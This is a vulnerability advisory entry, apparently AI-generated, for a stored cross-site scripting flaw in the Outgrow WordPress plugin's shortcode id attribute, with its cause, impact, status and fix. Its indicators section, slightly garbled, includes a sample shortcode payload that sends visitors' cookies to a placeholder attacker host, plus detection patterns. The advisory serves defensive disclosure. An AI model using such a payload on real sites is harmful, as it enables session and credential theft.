
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1889 is a Stored Cross-Site Scripting (XSS) vulnerability in the Outgrow plugin for WordPress, affecting all versions up to and including 2.1. The flaw exists in the id attribute of the [outgrow] shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on March 21, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. The vulnerable code is located in newOutgrow.php at line 87, where the id attribute passed to the [outgrow] shortcode is rendered without proper sanitization or escaping. An authenticated attacker with at least contributor-level access can embed a malicious JavaScript payload in the shortcode attribute within a post or page, which is then stored in the database and executed in the browsers of any user who visits the affected page (Wordfence, WordPress Plugin Trac).
Successful exploitation allows an attacker to inject persistent malicious scripts that execute in the context of any visitor's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, defacement, redirection to malicious sites, or further attacks against site administrators. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect all users visiting the compromised page (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1889. The EPSS score is approximately 0.03%, indicating a low probability of near-term exploitation. The vulnerability requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities. It does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).
id attribute, e.g., [outgrow id="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].[outgrow id="..."] shortcodes containing <script>, javascript:, or encoded variants (e.g., <script>) in post content.newOutgrow.php or other plugin files if the attacker escalated to file write access after initial XSS exploitation.[outgrow] shortcode with anomalous or encoded id attribute values.Users should update the Outgrow WordPress plugin to version 2.2 or later, which addresses the insufficient sanitization of the id shortcode attribute. As an interim workaround, site administrators can restrict contributor-level users from publishing content without editorial review, or temporarily disable the Outgrow plugin until the update is applied. Reviewing existing posts and pages for suspicious [outgrow] shortcode usage is also recommended (Wordfence, WordPress Plugin).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."